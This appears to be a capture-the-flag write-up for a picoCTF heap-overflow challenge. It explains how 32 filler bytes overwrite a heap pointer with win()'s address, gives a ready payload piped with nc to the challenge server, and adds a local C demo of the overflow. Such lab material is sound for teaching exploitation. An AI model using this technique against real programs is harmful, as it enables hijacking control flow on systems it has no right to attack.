
heap 2

void check_win() { ((void (*)())*(int*)x)(); }

check_win() reads 4 bytes from the memory x points to and calls that value as a function, so the heap data behind x has to end up holding the address of win(). The write buffer sits 32 bytes before that data on the heap (two small chunks back to back, 16-byte header plus 24 usable bytes each), and the write is not bounds-checked, so 32 bytes of filler followed by the address lands exactly on it. objdump or gdb (p win) gives the address of win(): 0x00000000004011a0. The binary is not PIE, so this address fits in the 4 bytes that check_win() reads; the upper four zero bytes of the 8-byte value sent below are just padding.

Send 32 filler bytes and then the address least-significant byte first (0x4011a0 becomes \xa0\x11\x40\x00\x00\x00\x00\x00) as the input for menu option 2; the other menu choices go on their own lines:

echo -e -n "2\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa0\x11\x40\x00\x00\x00\x00\x00\n1\n3\n4\n" | nc mimas.picoctf.net 53134

Note that echo -e with \x escapes is bash behaviour; if your /bin/sh is dash, run the line under bash (or use printf with octal escapes instead), and check with xxd that the 8 address bytes actually go out in the order shown.
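The layout the exploit relies on, re-created locally as an added example (this is not the challenge's source and not the writeup author's code): two malloc(5) chunks, an unchecked write into the first that runs over into the second, and the same 4-byte read in check_win. Here win() only sets a flag instead of printing the flag, the chunk distance is measured at run time rather than assumed to be 32, and it assumes x86-64 glibc; the 4-byte read is used only when the address fits in an int, as it does for the non-PIE target, and a PIE build of the demo falls back to a full pointer read.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static char *x;            /* stands in for the challenge's global x */
static int win_called;     /* set by the stand-in win(); the real win() prints the flag */

static void win(void) { win_called = 1; }

/* The challenge's check_win: a 4-byte read from the memory x points to,
 * then a call through that value. The challenge writes it as
 *   ((void (*)())*(int*)x)();
 * the intptr_t cast here only silences the int-to-pointer size warning. */
static void check_win(void) { ((void (*)(void))(intptr_t)*(int *)x)(); }

/* Returns 1 if the overflow redirected check_win() into win(), else 0. */
int run_demo(void) {
    volatile size_t small = 5;         /* keeps the compiler from knowing the buffer size */
    char *input_data = malloc(small);  /* the write buffer */
    x = malloc(small);                 /* the chunk check_win() reads from */
    if (!input_data || !x) return 0;

    /* On x86-64 glibc malloc(5) rounds up to a 0x20-byte chunk (16-byte
     * header + 24 usable bytes), so consecutive chunks put x 32 bytes
     * after input_data. Measured here instead of hard-coded. */
    long dist = (long)((uintptr_t)x - (uintptr_t)input_data);
    if (dist <= 0 || dist > 64) return 0;  /* other allocator; layout assumption does not hold */

    /* Payload as in the echo command: dist filler bytes, then the address
     * of win() least-significant byte first (little-endian). */
    unsigned char payload[64 + sizeof(uintptr_t)];
    uintptr_t target = (uintptr_t)win;
    memset(payload, 'a', (size_t)dist);
    for (size_t i = 0; i < sizeof target; i++)
        payload[dist + i] = (unsigned char)(target >> (8 * i));
    size_t len = (size_t)dist + sizeof target;

    /* The unchecked write: runs past input_data's 24 usable bytes, over x's
     * chunk header (harmless as long as x is never freed) and into x's data. */
    for (size_t i = 0; i < len; i++)
        input_data[i] = (char)payload[i];

    /* The 4-byte read in check_win is enough for the non-PIE target, where
     * 0x4011a0 fits in an int. A PIE build of this demo has a larger address,
     * so in that case read back the full pointer the payload wrote. */
    if (target <= 0x7fffffffUL) {
        check_win();
    } else {
        void (*fp)(void);
        memcpy(&fp, x, sizeof fp);
        fp();
    }
    return win_called;
}

int main(void) {
    printf("heap overflow demo: win() %s\n",
           run_demo() ? "was called (the real one would print the flag)" : "was not called");
    return 0;
}
```

Build it without PIE (gcc -no-pie) to take the same check_win() path as the challenge binary; with the default PIE build the full-pointer branch runs and the printed result is the same, which is exactly why a 4-byte function-pointer read is only exploitable this way on a non-PIE target.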